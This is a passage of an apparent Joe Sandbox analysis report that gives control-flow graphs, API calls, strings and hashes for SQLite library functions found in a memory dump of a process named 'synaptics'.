                                                                                                                                                                                                              control_flow_graph 1244 6c130ef0-6c130f0d 1245 6c130f13-6c130f1a 1244->1245 1246 6c13122d-6c131235 1244->1246 1247 6c130f36-6c130f3a 1245->1247 1248 6c130f1c-6c130f35 call 6c130df0 1245->1248 1250 6c130f40-6c130f45 1247->1250 1251 6c13121f 1247->1251 1252 6c1311b2-6c1311b6 1250->1252 1253 6c130f4b-6c130f55 1250->1253 1255 6c131221-6c13122a call 6c130df0 1251->1255 1252->1251 1258 6c1311b8-6c1311ba 1252->1258 1253->1252 1257 6c130f5b-6c130f66 1253->1257 1255->1246 1257->1252 1260 6c130f6c-6c130f8c call 6c0c9f90 1257->1260 1261 6c1311c1-6c1311dc call 6c112d80 1258->1261 1262 6c1311bc-6c1311bf 1258->1262 1269 6c130f8e-6c130f97 1260->1269 1270 6c130f9d-6c130fa4 1260->1270 1267 6c1311e5-6c1311f4 call 6c0c9f90 1261->1267 1268 6c1311de-6c1311e3 1261->1268 1262->1251 1262->1261 1278 6c1311f6-6c1311fb 1267->1278 1279 6c13120f-6c131216 1267->1279 1268->1255 1272 6c130fb7-6c130fde call 6c1319a0 1269->1272 1273 6c130f99-6c130f9b 1269->1273 1270->1272 1274 6c130fa6-6c130fb4 call 6c130df0 1270->1274 1281 6c130fe3-6c130ff5 1272->1281 1273->1270 1273->1272 1274->1272 1278->1279 1282 6c1311fd-6c131200 1278->1282 1279->1246 1283 6c131218-6c13121d 1279->1283 1284 6c130ff7-6c130ffe 1281->1284 1285 6c131035-6c131045 1281->1285 1282->1279 1286 6c131202-6c13120d call 6c130ec0 1282->1286 1283->1255 1284->1285 1288 6c131000-6c131003 1284->1288 1285->1246 1287 6c13104b-6c13104f 1285->1287 1286->1246 1286->1279 1292 6c131051-6c131083 sqlite3_log * 2 1287->1292 1293 6c131084-6c131089 1287->1293 1289 6c131005 1288->1289 1290 6c131008-6c13100b 1288->1290 1289->1290 1294 6c131016-6c131019 1290->1294 1295 6c13100d-6c131014 call 6c0c5870 1290->1295 1297 6c131095-6c13109c 1293->1297 1298 6c13108b-6c131092 1293->1298 1294->1285 1302 6c13101b-6c13101d 1294->1302 1295->1285 1299 6c1310b2-6c1310cf call 6c0ed0b0 call 6c0ed280 1297->1299 1300 6c13109e 1297->1300 1298->1297 1315 6c1310d1-6c1310de 1299->1315 1316 6c1310e6-6c1310ec 1299->1316 1304 6c1310a0-6c1310a7 1300->1304 1305 6c1310a9-6c1310ad call 6c0ef460 1300->1305 1302->1285 1308 6c13101f-6c131032 sqlite3_errmsg call 6c130df0 1302->1308 1304->1299 1304->1305 1305->1299 1308->1285 1315->1316 1317 6c1310e0-6c1310e3 1315->1317 1318 6c131121-6c131128 1316->1318 1319 6c1310ee-6c1310f4 1316->1319 1317->1316 1320 6c131135-6c13113c 1318->1320 1321 6c13112a-6c131133 call 6c0c50a0 1318->1321 1322 6c1310f6-6c131104 1319->1322 1323 6c131109-6c13110f 1319->1323 1327 6c131183 1320->1327 1328 6c13113e-6c131145 1320->1328 1324 6c13118d-6c131195 1321->1324 1322->1324 1323->1318 1325 6c131111-6c13111f 1323->1325 1330 6c131197-6c131199 1324->1330 1331 6c13119b-6c13119d call 6c0c5950 1324->1331 1325->1324 1334 6c13118a 1327->1334 1332 6c131151-6c131178 1328->1332 1333 6c131147-6c13114e 1328->1333 1330->1331 1335 6c1311a2-6c1311b1 call 6c166b20 1330->1335 1331->1335 1332->1324 1342 6c13117a-6c131181 1332->1342 1333->1332 1334->1324 1342->1334
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_log.SQLITE3(00000015,API called with finalized prepared statement,?,00000000,?,?,sqlite_temp_master,?,?,?), ref: 6C131058
                                                                                                                                                                                                              • sqlite3_log.SQLITE3(00000015,%s at line %d of [%.10s],misuse,00015592,df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24,00000015,API called with finalized prepared statement,?,00000000,?,?,sqlite_temp_master,?,?,?), ref: 6C131073
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24$invalid rootpage$misuse$orphan index$sqlite_temp_master
                                                                                                                                                                                                              • API String ID: 632333372-3602594351
                                                                                                                                                                                                              • Opcode ID: cf06d395420d0346f219ccf879ad32335dec0bad17351a9005360e32c5d696e7
                                                                                                                                                                                                              • Instruction ID: 19a93771d6f9af47309309404dab2518ec96a9ec71490cc084288fe7e885a70b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf06d395420d0346f219ccf879ad32335dec0bad17351a9005360e32c5d696e7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91A104707053619BEB01CE35984479AB7E6BF5630CF345629D86D8BB41DB34E449CBC2

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1344 6c131240-6c1312ea call 6c130ef0 1347 6c1312f0-6c131307 1344->1347 1348 6c13166e-6c131671 1344->1348 1349 6c131309-6c131313 1347->1349 1350 6c131318-6c13131c 1347->1350 1351 6c131673-6c131679 1348->1351 1352 6c13167b-6c13167d call 6c0c5870 1348->1352 1353 6c13168e-6c1316a5 call 6c1bf614 1349->1353 1354 6c13131e-6c131325 1350->1354 1355 6c13132c-6c131331 1350->1355 1351->1352 1357 6c131682-6c131687 call 6c112fb0 1351->1357 1352->1357 1354->1355 1359 6c131327 call 6c0da840 1354->1359 1361 6c131333-6c131337 1355->1361 1362 6c13133d-6c131341 call 6c0dd980 1355->1362 1363 6c13168c 1357->1363 1359->1355 1361->1362 1366 6c1313bb-6c1313bd 1361->1366 1368 6c131346-6c13134d 1362->1368 1363->1353 1369 6c1313c0-6c1313d5 call 6c0e5c70 1366->1369 1370 6c1313b1-6c1313b4 1368->1370 1371 6c13134f-6c13135b call 6c167480 1368->1371 1375 6c1313d7-6c1313e5 1369->1375 1370->1366 1379 6c131361-6c131363 1371->1379 1380 6c13135d-6c13135f 1371->1380 1377 6c1313f2 1375->1377 1378 6c1313e7-6c1313f0 1375->1378 1383 6c1313f5-6c131402 1377->1383 1378->1383 1381 6c131366-6c13136b 1379->1381 1382 6c131397-6c13139e 1380->1382 1381->1381 1384 6c13136d-6c131386 call 6c0c5500 1381->1384 1387 6c1313a0-6c1313a7 call 6c0c50f0 1382->1387 1388 6c1313aa-6c1313ac 1382->1388 1385 6c131423-6c131433 1383->1385 1386 6c131404-6c131406 1383->1386 1384->1382 1406 6c131388-6c131394 memmove 1384->1406 1392 6c1314d9-6c1314e6 1385->1392 1393 6c131439-6c13143e 1385->1393 1390 6c131408-6c13140c 1386->1390 1391 6c13144e-6c131454 1386->1391 1387->1388 1395 6c131653-6c13165d 1388->1395 1390->1391 1397 6c13140e-6c13141e call 6c11bc10 1390->1397 1391->1385 1405 6c131456-6c131468 call 6c0c5500 1391->1405 1401 6c1314e8-6c1314ec 1392->1401 1402 6c1314ef-6c1314f3 1392->1402 1403 6c131440-6c131445 1393->1403 1404 6c1314bb-6c1314c2 1393->1404 1399 6c13166a-6c13166c 1395->1399 1400 6c13165f-6c131663 1395->1400 1397->1385 1399->1348 1399->1363 1400->1399 1409 6c131665 call 6c0da800 1400->1409 1401->1402 1412 6c1314f5-6c131507 call 6c0c5500 1402->1412 1413 6c13153c-6c13153e 1402->1413 1410 6c131447-6c13144c 1403->1410 1411 6c1314b9 1403->1411 1408 6c1314c5-6c1314d6 call 6c0dd120 1404->1408 1421 6c13146a-6c13149a 1405->1421 1422 6c13149d-6c1314a4 1405->1422 1406->1382 1408->1392 1409->1399 1410->1408 1411->1404 1427 6c131520-6c131527 1412->1427 1428 6c131509-6c13151b 1412->1428 1415 6c131540-6c131543 1413->1415 1416 6c13154f-6c1315ad call 6c0c82f0 sqlite3_exec 1413->1416 1415->1416 1423 6c131545-6c13154c 1415->1423 1435 6c1315b6-6c1315b8 1416->1435 1436 6c1315af-6c1315b1 call 6c0c50f0 1416->1436 1421->1422 1429 6c1314a6-6c1314a8 call 6c0c50f0 1422->1429 1430 6c1314ad-6c1314b4 1422->1430 1423->1416 1427->1430 1433 6c131529-6c131537 call 6c0c50f0 1427->1433 1428->1427 1429->1430 1434 6c131608 1430->1434 1433->1434 1438 6c13160b-6c13160f 1434->1438 1440 6c1315c4-6c1315c8 1435->1440 1441 6c1315ba-6c1315bf call 6c110ad0 1435->1441 1436->1435 1438->1395 1445 6c131611-6c131618 1438->1445 1442 6c1315e1-6c1315e3 1440->1442 1443 6c1315ca-6c1315df call 6c1131b0 1440->1443 1441->1440 1448 6c1315f7-6c131606 1442->1448 1449 6c1315e5-6c1315f0 1442->1449 1443->1438 1450 6c13162a-6c131635 call 6c0dea30 1445->1450 1451 6c13161a-6c131621 1445->1451 1448->1434 1449->1434 1453 6c1315f2-6c1315f5 1449->1453 1458 6c131640-6c131644 1450->1458 1459 6c131637-6c13163b call 6c0dec30 1450->1459 1451->1450 1454 6c131623-6c131625 call 6c0da840 1451->1454 1453->1434 1453->1448 1454->1450 1458->1395 1461 6c131646-6c13164a 1458->1461 1459->1458 1461->1395 1462 6c13164c-6c13164e call 6c0da800 1461->1462 1462->1395
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
                                                                                                                                                                                                              • API String ID: 0-2721705208
                                                                                                                                                                                                              • Opcode ID: 4b81339dc4f2f9d9ee0239c419b6983e21d0cbf121ae229ee6ef42bd1cc1e86b
                                                                                                                                                                                                              • Instruction ID: 891d0a23e98b5229b53e7e357fd49a55c49622dc17300d92126023dd605d9e08
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b81339dc4f2f9d9ee0239c419b6983e21d0cbf121ae229ee6ef42bd1cc1e86b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EEE1D170F043549BDB14CFA4C4807ADBBB2BF9531CF289259D8196BB81DB75E886CB80

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1464 6c0cb850-6c0cb872 1465 6c0cb874 1464->1465 1466 6c0cb8e0-6c0cb8e3 1464->1466 1467 6c0cb87a-6c0cb88e 1465->1467 1468 6c0cb876-6c0cb878 1465->1468 1469 6c0cb8e6-6c0cb8ff 1466->1469 1470 6c0cb890 1467->1470 1471 6c0cb8b1-6c0cb8de memmove 1467->1471 1468->1466 1468->1467 1472 6c0cb900-6c0cb915 ReadFile 1469->1472 1473 6c0cb896-6c0cb8a5 memmove 1470->1473 1474 6c0cb892-6c0cb894 1470->1474 1471->1469 1475 6c0cb99b-6c0cb99d 1472->1475 1476 6c0cb91b-6c0cb924 1472->1476 1477 6c0cb8a8-6c0cb8b0 1473->1477 1474->1471 1474->1473 1478 6c0cb99f-6c0cb9c3 sqlite3_log 1475->1478 1479 6c0cb9c6-6c0cb9cb 1475->1479 1476->1475 1482 6c0cb926-6c0cb932 1476->1482 1478->1479 1479->1477 1480 6c0cb9d1-6c0cb9ed memset 1479->1480 1484 6c0cb934-6c0cb937 1482->1484 1485 6c0cb972-6c0cb99a call 6c0cb690 1482->1485 1486 6c0cb959-6c0cb970 1484->1486 1487 6c0cb939-6c0cb93c 1484->1487 1486->1472 1487->1486 1489 6c0cb93e-6c0cb941 1487->1489 1489->1486 1491 6c0cb943-6c0cb946 1489->1491 1491->1486 1493 6c0cb948-6c0cb94b 1491->1493 1493->1486 1494 6c0cb94d-6c0cb950 1493->1494 1494->1486 1495 6c0cb952-6c0cb957 1494->1495 1495->1485 1495->1486
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memmove.VCRUNTIME140(?,?,?), ref: 6C0CB8A0
                                                                                                                                                                                                              • memmove.VCRUNTIME140(?,?,?), ref: 6C0CB8C1
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,?,?,?), ref: 6C0CB90D
                                                                                                                                                                                                              • sqlite3_log.SQLITE3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000B9CA), ref: 6C0CB9BE
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6C0CB9DA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • winRead, xrefs: 6C0CB987
                                                                                                                                                                                                              • delayed %dms for lock/sharing conflict at line %d, xrefs: 6C0CB9B7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memmove$FileReadmemsetsqlite3_log
                                                                                                                                                                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                              • API String ID: 3967818091-1843600136
                                                                                                                                                                                                              • Opcode ID: 18fb9d659dec37f111e76ec7767c70bf699bbe6d4d092a5253f83ccd47d45edf
                                                                                                                                                                                                              • Instruction ID: afd74c0bbd8df67cc38403e07ae44833f5426eac5ccf97b5b59e7d6d97f3d44e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18fb9d659dec37f111e76ec7767c70bf699bbe6d4d092a5253f83ccd47d45edf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A519071B01109ABDF14CFA8DCC1BAEB7F9EB89314B24566AF904D7640D630E989C7D2

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1496 6c1146f0-6c11471a 1497 6c114720-6c11472b 1496->1497 1498 6c114b6a-6c114b70 1496->1498 1499 6c114744-6c11474b 1497->1499 1500 6c11472d-6c114743 call 6c0c92b0 1497->1500 1502 6c114755-6c11475b 1499->1502 1503 6c11474d-6c114750 call 6c0c9390 1499->1503 1506 6c114761-6c11476c 1502->1506 1507 6c114865-6c114868 1502->1507 1503->1502 1506->1507 1510 6c114772 1506->1510 1508 6c114908-6c11490f 1507->1508 1509 6c11486e-6c11487e call 6c0c9390 1507->1509 1512 6c114911 1508->1512 1513 6c114916-6c114937 call 6c0c5500 1508->1513 1519 6c114880-6c114889 1509->1519 1514 6c114777-6c11477c 1510->1514 1512->1513 1513->1498 1528 6c11493d-6c114947 1513->1528 1517 6c114799-6c11479b 1514->1517 1518 6c11477e-6c114790 1514->1518 1522 6c1147b9-6c1147c2 1517->1522 1523 6c11479d-6c1147b3 1517->1523 1518->1517 1521 6c114792-6c114796 1518->1521 1526 6c1148fb-6c114902 1519->1526 1527 6c11488b-6c114899 1519->1527 1521->1514 1529 6c114798 1521->1529 1524 6c1147e5-6c1147e8 1522->1524 1525 6c1147c4-6c1147c9 1522->1525 1523->1507 1523->1522 1524->1507 1531 6c1147ea-6c1147f4 1524->1531 1530 6c1147d0-6c1147da 1525->1530 1526->1508 1526->1519 1532 6c1148a1-6c1148a3 1527->1532 1533 6c11489b-6c11489f 1527->1533 1534 6c114959-6c11497c memmove call 6c0c9340 1528->1534 1535 6c114949-6c114956 call 6c10b730 1528->1535 1529->1517 1530->1524 1536 6c1147dc-6c1147e3 1530->1536 1531->1507 1537 6c1147f6-6c1147fb 1531->1537 1532->1526 1539 6c1148a5-6c1148a9 1532->1539 1538 6c1148f3-6c1148f5 1533->1538 1553 6c114995-6c1149b0 1534->1553 1554 6c11497e 1534->1554 1535->1534 1536->1524 1536->1530 1543 6c114800-6c114805 1537->1543 1538->1526 1542 6c1149e4-6c1149fa 1538->1542 1544 6c1148d1 1539->1544 1545 6c1148ab 1539->1545 1542->1512 1551 6c114a00-6c114a04 1542->1551 1548 6c114822-6c114824 1543->1548 1549 6c114807-6c114819 1543->1549 1552 6c1148d2-6c1148d4 1544->1552 1550 6c1148b0-6c1148b5 1545->1550 1558 6c114826-6c11483c 1548->1558 1559 6c11483e-6c114844 1548->1559 1549->1548 1557 6c11481b-6c11481f 1549->1557 1550->1552 1560 6c1148b7-6c1148c9 1550->1560 1551->1512 1552->1542 1561 6c1148da-6c1148f0 1552->1561 1555 6c1149b2-6c1149b5 1553->1555 1556 6c114a2f-6c114a4f 1553->1556 1562 6c114980-6c114990 1554->1562 1564 6c1149b8-6c1149bb 1555->1564 1565 6c114a51-6c114a5d call 6c0c5500 1556->1565 1566 6c114a62-6c114a6b 1556->1566 1557->1543 1567 6c114821 1557->1567 1558->1507 1558->1559 1559->1507 1569 6c114846-6c11484c 1559->1569 1560->1552 1568 6c1148cb-6c1148cf 1560->1568 1561->1538 1562->1562 1563 6c114992 1562->1563 1563->1553 1570 6c1149d3-6c1149dd 1564->1570 1571 6c1149bd-6c1149c8 call 6c0c9420 1564->1571 1584 6c114af6-6c114afd 1565->1584 1573 6c114ae8-6c114af1 call 6c0c55f0 1566->1573 1574 6c114a6d-6c114a73 1566->1574 1567->1548 1568->1544 1568->1550 1575 6c114850-6c11485a 1569->1575 1581 6c114a2c 1570->1581 1582 6c1149df-6c1149e2 1570->1582 1590 6c114a09-6c114a2b call 6c0c92b0 call 6c0c50f0 1571->1590 1591 6c1149ca-6c1149d0 1571->1591 1573->1584 1579 6c114a75-6c114a77 1574->1579 1580 6c114ac7-6c114acd 1574->1580 1575->1507 1583 6c11485c-6c114863 1575->1583 1579->1573 1586 6c114a79 1579->1586 1580->1573 1587 6c114acf-6c114adf 1580->1587 1581->1556 1582->1564 1583->1507 1583->1575 1588 6c114a83-6c114aa5 1584->1588 1589 6c114aff-6c114b0e call 6c0c50f0 1584->1589 1586->1588 1592 6c114a7b-6c114a81 1586->1592 1587->1573 1593 6c114ae1 1587->1593 1596 6c114aa7-6c114ac2 1588->1596 1597 6c114b0f-6c114b11 1588->1597 1591->1570 1592->1573 1592->1588 1593->1588 1594 6c114ae3-6c114ae6 1593->1594 1594->1573 1594->1588 1601 6c114b55-6c114b63 1596->1601 1600 6c114b14-6c114b19 1597->1600 1600->1600 1603 6c114b1b-6c114b50 memmove call 6c0c9340 call 6c114be0 1600->1603 1601->1498 1603->1601
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: A$always$duplicate column name: %s$generated$too many columns on %s
                                                                                                                                                                                                              • API String ID: 0-3534847969
                                                                                                                                                                                                              • Opcode ID: 5f35425e267b47167df3bf60619309d360e7698e391515cfc9b4f3af3c4d3e14
                                                                                                                                                                                                              • Instruction ID: d56c5b783ab7043a427e9202a61b1de9b00e94ba8feaa43801a66aa81669ac05
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f35425e267b47167df3bf60619309d360e7698e391515cfc9b4f3af3c4d3e14
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46E17A71A0C1958BDB048F6494507BEBBB1AF5671CF1941BDE8916BF42D33E8A02CB91

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1610 6c0d5b70-6c0d5b7f 1611 6c0d5ba9-6c0d5bc9 1610->1611 1612 6c0d5b81-6c0d5ba8 sqlite3_log 1610->1612 1614 6c0d5bcf-6c0d5bd9 1611->1614 1615 6c0d5c82-6c0d5c8e 1611->1615 1618 6c0d5bdf-6c0d5bee 1614->1618 1619 6c0d5c75-6c0d5c7a 1614->1619 1616 6c0d5c9f-6c0d5ca2 1615->1616 1617 6c0d5c90-6c0d5c9d call 6c0d0550 1615->1617 1622 6c0d5ca6-6c0d5cb5 1616->1622 1617->1622 1629 6c0d5c4e-6c0d5c6b 1618->1629 1630 6c0d5bf0-6c0d5bf5 1618->1630 1620 6c0d5d38-6c0d5d42 1619->1620 1625 6c0d5d4b-6c0d5d5c 1620->1625 1626 6c0d5d44-6c0d5d46 call 6c0d30c0 1620->1626 1627 6c0d5cca-6c0d5cd0 1622->1627 1628 6c0d5cb7-6c0d5cb9 1622->1628 1626->1625 1633 6c0d5cf7-6c0d5d00 1627->1633 1634 6c0d5cd2-6c0d5cf5 sqlite3_log 1627->1634 1628->1627 1632 6c0d5cbb-6c0d5cc9 1628->1632 1629->1620 1651 6c0d5c71-6c0d5c73 1629->1651 1638 6c0d5c0b-6c0d5c10 1630->1638 1639 6c0d5bf7-6c0d5bfc 1630->1639 1636 6c0d5d24-6c0d5d2a 1633->1636 1637 6c0d5d02-6c0d5d05 1633->1637 1635 6c0d5d31-6c0d5d33 call 6c0d0650 1634->1635 1635->1620 1646 6c0d5d5d-6c0d5d5f 1636->1646 1647 6c0d5d2c 1636->1647 1637->1636 1641 6c0d5d07-6c0d5d09 1637->1641 1644 6c0d5c30-6c0d5c40 1638->1644 1645 6c0d5c12-6c0d5c17 1638->1645 1642 6c0d5bfe-6c0d5c02 1639->1642 1643 6c0d5c04-6c0d5c09 1639->1643 1641->1636 1652 6c0d5d0b-6c0d5d13 call 6c0d3c70 1641->1652 1642->1638 1642->1643 1643->1638 1643->1639 1665 6c0d5c4b 1644->1665 1666 6c0d5c42-6c0d5c45 1644->1666 1645->1629 1653 6c0d5c19 1645->1653 1649 6c0d5d8f-6c0d5d9f memset 1646->1649 1650 6c0d5d61-6c0d5d68 1646->1650 1647->1635 1659 6c0d5da2-6c0d5daa 1649->1659 1654 6c0d5d6c-6c0d5d6f 1650->1654 1655 6c0d5d6a 1650->1655 1651->1619 1656 6c0d5c7f 1651->1656 1663 6c0d5d18-6c0d5d1c 1652->1663 1658 6c0d5c20-6c0d5c25 1653->1658 1661 6c0d5d7b-6c0d5d8b call 6c0d2890 1654->1661 1662 6c0d5d71-6c0d5d76 call 6c0cfd80 1654->1662 1655->1654 1656->1615 1658->1644 1664 6c0d5c27-6c0d5c2c 1658->1664 1661->1649 1672 6c0d5d8d 1661->1672 1662->1661 1663->1659 1668 6c0d5d22 1663->1668 1664->1658 1670 6c0d5c2e 1664->1670 1665->1629 1666->1620 1666->1665 1668->1635 1670->1629 1672->1649
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_log.SQLITE3(0000000B,%s at line %d of [%.10s],database corruption,0000ED15,df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24), ref: 6C0D5B97
                                                                                                                                                                                                                • Part of subcall function 6C0C84F0: sqlite3_str_vappendf.SQLITE3(?,?,?), ref: 6C0C8551
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_logsqlite3_str_vappendf
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$database corruption$df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24
                                                                                                                                                                                                              • API String ID: 3450200083-2551159147
                                                                                                                                                                                                              • Opcode ID: 918e1f9e6b134bd38360740f105a8bad77f9642bb5e0069a8df6beba744606fa
                                                                                                                                                                                                              • Instruction ID: 5a05cece81107a9003e543c4265a7c3fc880ff514c6bfe92fc3dcec3d5fca0d5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 918e1f9e6b134bd38360740f105a8bad77f9642bb5e0069a8df6beba744606fa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA61E4B97003009FEB108F25E884B5A77F5EF8531DF16456AEC199BA41D731F805CBA1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1673 6c0ce7d0-6c0ce830 GetSystemInfo sqlite3_vfs_register * 4 1674 6c0ce83f-6c0ce851 1673->1674 1675 6c0ce832-6c0ce83e 1673->1675
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(6C1D94D0,6C165A9F), ref: 6C0CE7F0
                                                                                                                                                                                                              • sqlite3_vfs_register.SQLITE3(6C1D9068,00000001), ref: 6C0CE7FD
                                                                                                                                                                                                                • Part of subcall function 6C0C45A0: sqlite3_initialize.SQLITE3(?,6C0CE802,6C1D9068,00000001), ref: 6C0C45A3
                                                                                                                                                                                                              • sqlite3_vfs_register.SQLITE3(6C1D7218,00000000,6C1D9068,00000001), ref: 6C0CE809
                                                                                                                                                                                                              • sqlite3_vfs_register.SQLITE3(6C1D81E8,00000000,6C1D7218,00000000,6C1D9068,00000001), ref: 6C0CE815
                                                                                                                                                                                                              • sqlite3_vfs_register.SQLITE3(6C1D8578,00000000,6C1D81E8,00000000,6C1D7218,00000000,6C1D9068,00000001), ref: 6C0CE821
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
